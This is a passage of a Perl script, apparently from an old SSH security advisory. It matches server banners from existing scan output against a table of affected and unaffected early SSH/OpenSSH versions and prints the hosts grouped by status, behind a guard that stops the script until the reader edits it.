    'SSH-1.99-2.4.0'            => 'affected w/ version 1 fallback',
    'SSH-1.99-3.0.0'            => 'affected w/ version 1 fallback',
    'SSH-1.99-3.0.1'            => 'affected w/ version 1 fallback',
    'SSH-1.99-OpenSSH-2.1'      => 'affected',
    'SSH-1.99-OpenSSH_2.1.1'    => 'affected',
    'SSH-1.99-OpenSSH_2.2.0'    => 'affected',
    'SSH-1.99-OpenSSH_2.2.0p1'  => 'affected',
    'SSH-1.99-OpenSSH_2.3.0'    => 'not affected',
    'SSH-1.99-OpenSSH_2.3.0p1'  => 'not affected',
    'SSH-1.99-OpenSSH_2.5.1'    => 'not affected',
    'SSH-1.99-OpenSSH_2.5.1p1'  => 'not affected',
    'SSH-1.99-OpenSSH_2.5.1p2'  => 'not affected',
    'SSH-1.99-OpenSSH_2.5.2p2'  => 'not affected',
    'SSH-1.99-OpenSSH_2.9.9p2'  => 'not affected',
    'SSH-1.99-OpenSSH_2.9'      => 'not affected',
    'SSH-1.99-OpenSSH_2.9p1'    => 'not affected',
    'SSH-1.99-OpenSSH_2.9p2'    => 'not affected',
    'SSH-1.99-OpenSSH_3.0p1'    => 'not affected',
    'SSH-2.0-1.1.1'             => 'unknown',
    'SSH-2.0-2.3.0'             => 'affected w/ version 1 fallback',
    'SSH-2.0-2.4.0'             => 'affected w/ version 1 fallback',
    'SSH-2.0-3.0.0'             => 'affected w/ version 1 fallback',
    'SSH-2.0-3.0.1'             => 'affected w/ version 1 fallback',
    'SSH-2.0-OpenSSH_2.5.1p1'   => 'not affected',
    'SSH-2.0-OpenSSH_2.5.2p2'   => 'not affected',
    'SSH-2.0-OpenSSH_2.9.9p2'   => 'not affected',
    'SSH-2.0-OpenSSH_2.9p2'     => 'not affected',
);
# Banners are matched case-insensitively, since scanners differ in how
# they report them; a banner that is not in the table reports as unknown.
%affected = map { lc } %affected;

# Make sure you read the code first.
iknowwhatimdoing();

my $all = 0;
if (@ARGV && $ARGV[0] eq "-a") {
    shift @ARGV;
    $all = 1;
}

my %server;
while (<>) {
    chomp;
    s/\s+/ /g;
    my ($ip, $host, $version) = split(' ', $_);
    next unless defined $version;
    # Adjust this to identify other strings reported
    # by servers that have access restrictions, etc.
    # in place and do not show a specific version number.
    # These all fall under the category "unknown" in this case.
    $version = "unknown"
        if ($version eq "Couldn't" ||
            $version eq "Unknown" ||
            $version eq "You" ||
            $version eq "Timeout");
    $server{"$version:$ip"} = $host;
}

my $curver = "";
foreach my $i (sort keys %server) {
    my ($version, $ip) = split(":", $i);
    my $status = $affected{lc $version} || 'unknown';
    next if ($status eq "not affected" && !$all);
    if ($curver ne $version) {
        printf("\n\n%s (%s)\n", $version, $status);
        $curver = $version;
    }
    print "   " . $server{$i} . " ($ip)\n";
}
exit(0);

sub iknowwhatimdoing {
    my $iknowwhatimdoing = 0;
    # Uncomment the following line to make this script work.
    # $iknowwhatimdoing++;
    die "I told you to read the code first, didn't I?\n"
        unless $iknowwhatimdoing;
    return;
}

= - = - = - = - = - = - = - = - = - = - = - cut here - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
